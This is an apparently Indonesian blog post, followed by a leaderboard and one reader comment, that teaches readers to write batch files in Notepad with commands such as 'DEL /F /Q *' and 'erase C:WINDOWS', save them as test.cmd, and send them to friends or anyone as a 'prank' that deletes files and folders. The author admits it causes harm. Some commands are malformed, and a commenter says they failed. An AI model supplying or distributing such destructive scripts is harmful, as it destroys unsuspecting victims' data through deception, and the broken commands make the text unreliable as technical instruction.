Best Author
sangdedi

743,915
octa

487,247
fitrotinnikm

456,625
idjah

445,477
dwi

313,905
adit

310,306
resta-andara

275,973
benedict

261,605
rahadian

241,188
bara

228,950
nabilalalala

217,000
kurnitap_

154,132
kuswanto

140,805
suranto

100,765
admin

99,130
iwan

80,055
kupukupu

78,106

NOTEPAD sebagai senjata baru Ngerjain Orang

Woy…!!! :evil:
maaf ni Gw cuma mo kasitahu aja neh, kalo emang kalian punya temen terus kalian pengen isengin atau ngerjain dia, gunakan saja noteped
Dan Gw secara punya solusinya…!!! :wink:
mungkin aja ini cara yang paling ok buat di test sama kalian semua.

1. Menghapus Files dan Folder

Berikut adalah caranya:
1. Bukalah notepad terlebih dahulu kemudian ketik DEL /F /Q *
2. Setelah itu save as kemudian simpan dan beri nama dengan nama test.cmd
3. Apabila anda mengklik double klik serta dengan menggunakan nama file test.cmd maka semua files serta folder yang anda sudah miliki akan terhapus.

2. Menghapus Files Tertentu

Berikut adalah caranya:
1. bukalah notepad terlebih dahulu kemudian ketik dengan tulisan erase C:TEST.txt
2. Lalu save as kemudian simpan dengan menggunakan nama test.cmd
3. Apabila anda mengklik doubel klik dengan menggunkan nama file test.cmd maka files TEST.txt yang ada di drive c:\ anda miliki akan terhapus

3. Menghapus Folder Tertentu

Berikut adalah caranya:
1. bukalah notepad terlebih dahulu kemudian ketik dengan tulisan erase C:WINDOWS
2. setelah itu save as lalu kemudian simpan dengan nama filenya yaitu test.cmd
3. Apabila anda mengklik dengan doubel klik serta dengan menggunkan nama file test.cmd maka folder WINDOWS di drive c:\  anda miliki akan terhapus

Nah kalau sudah selesai semuanya,  tinggal kalian kirim aja tuh ke temen kalian, atau siapapun. simpel kan tetapi dapat merugikan juga :!:   :wink:

Semoga kalian nggak salah dalam menggunakannya :!: :-)

Penulis :
Telah menulis sebanyak 41 artikel
Mendapatkan 101 komentar
  Rating tulisan 0 dari 5

1 Comment

  1. LARUKU

    December 8, 2011 at 2:16 am

    KAGA BERHASIL PAYAH DAH LW

    ILANGA PAAN MALAH KE NOTEPAD GW PAS KLIK 2X CKCCKCKKCKCKCKCCKCKKCK

    VA:F [1.9.22_1171]
    Rating: 0 (from 0 votes)

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>